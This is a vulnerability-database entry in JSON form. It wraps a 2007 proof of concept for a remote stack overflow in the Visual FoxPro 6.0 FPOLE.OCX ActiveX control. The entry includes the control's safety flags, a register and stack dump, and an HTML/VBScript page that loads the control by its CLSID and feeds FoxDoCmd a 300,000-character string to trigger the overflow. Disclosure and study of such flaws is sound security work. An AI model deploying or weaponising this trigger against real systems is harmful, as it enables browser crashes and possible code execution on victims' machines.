Description
No description provided by source.
{"href": "https://www.seebug.org/vuldb/ssvid-7235", "status": "poc", "bulletinFamily": "exploit", "modified": "2007-09-07T00:00:00", "title": "Microsoft Visual FoxPro 6.0 (FPOLE.OCX v. 6.0.8450.0) Remote PoC", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-7235", "cvelist": [], "description": "No description provided by source.", "viewCount": 4, "published": "2007-09-07T00:00:00", "sourceData": "\n <pre>\r\n<code><span\u00a0style="font:\u00a010pt\u00a0Courier\u00a0New;"><span\u00a0class="general1-symbol">-----------------------------------------------------------------------------------------------------------\r\n\u00a0<b>0-day:\u00a0Microsoft\u00a0Visual\u00a0FoxPro\u00a06.0\u00a0fpole\u00a01.0\u00a0Type\u00a0Library\u00a0(FPOLE.OCX\u00a0v.\u00a06.0.8450.0)\u00a0Remote\u00a0Stack\u00a0Overflow</b>\r\n\u00a0url:\u00a0http://www.microsoft.com\r\n\r\n\u00a0author:\u00a0shinnai\r\n\u00a0mail:\u00a0shinnai[at]autistici[dot]org\r\n\u00a0site:\u00a0http://shinnai.altervista.org\r\n\r\n\u00a0Tested\u00a0on\u00a0Windows\u00a0XP\u00a0Professional\u00a0SP2\u00a0all\u00a0patched,\u00a0with\u00a0Internet\u00a0Explorer\u00a07\r\n\r\n\u00a0This\u00a0control\u00a0is\u00a0marked\u00a0as:\r\n\u00a0<b>RegKey\u00a0Safe\u00a0for\u00a0Script:\u00a0Falso\r\n\u00a0RegKey\u00a0Safe\u00a0for\u00a0Init:\u00a0Falso\r\n\u00a0Implements\u00a0IObjectSafety:\u00a0Vero\r\n\u00a0IDisp\u00a0Safe:\u00a0\u00a0Safe\u00a0for\u00a0untrusted:\u00a0caller\u00a0\u00a0\r\n\u00a0KillBitSet:\u00a0Falso</b>\r\n\r\n\u00a0This\u00a0is\u00a0a\u00a0dump:\r\n\u00a0<b>registers:\r\n\r\n\u00a0EAX\u00a0000287C4\r\n\u00a0ECX\u00a0017923C8\r\n\u00a0EDX\u00a0017FC60D\u00a0ASCII\u00a0"bbbbbbbbbbbb..."\r\n\u00a0EBX\u00a004E51ED8\r\n\u00a0ESP\u00a0017FC3C0\r\n\u00a0EBP\u00a0017FC5FC\r\n\u00a0ESI\u00a0000493E1\r\n\u00a0EDI\u00a07C80BDB6\u00a0kernel32.lstrlenA\r\n\r\n\u00a0EIP\u00a004E46807\u00a0FPOLE.04E46807\r\n\u00a0\r\n\u00a0*********************************************\r\n\r\n\u00a0stack:\r\n\u00a0[...]\r\n\u00a0017FC60C\u00a0\u00a0|62626262\r\n\u00a0017FC610\u00a0\u00a0|62626262\r\n\u00a0017FC614\u00a0\u00a0|62626262\r\n\u00a0017FC618\u00a0\u00a0|62626262\r\n\u00a0017FC61C\u00a0\u00a0|62626262\r\n\u00a0[...]</b>\r\n\u00a0\r\n\u00a0so\u00a0I\u00a0think\u00a0code\u00a0execution\u00a0is\u00a0possible\u00a0even\u00a0if,\u00a0in\u00a0this\u00a0moment\u00a0of\u00a0my\u00a0life,\u00a0I\u00a0really\u00a0have\u00a0no\u00a0time\u00a0to\r\n\u00a0investigate\u00a0:)\r\n-----------------------------------------------------------------------------------------------------------\r\n\r\n<object\u00a0classid='clsid:EF28418F-FFB2-11D0-861A-00A0C903A97F'\u00a0id='test'></object>\r\n\r\n<input\u00a0language=VBScript\u00a0onclick=tryMe()\u00a0type=button\u00a0value="Click\u00a0here\u00a0to\u00a0start\u00a0the\u00a0test">\r\n\r\n<script\u00a0language\u00a0=\u00a0'vbscript'>\r\n\u00a0Sub\u00a0tryMe()\r\n\u00a0\u00a0buff\u00a0=\u00a0String(300000,\u00a0"b")\r\n\u00a0\u00a0test.FoxDoCmd\u00a0buff,\u00a01\r\n\u00a0End\u00a0Sub\r\n</script>\r\n</span></span>\r\n</code></pre>\n ", "id": "SSV:7235", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:58:03", "reporter": "Root", "enchantments": {"score": {"value": -0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.4}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645248923, "score": 1659785532}}
{}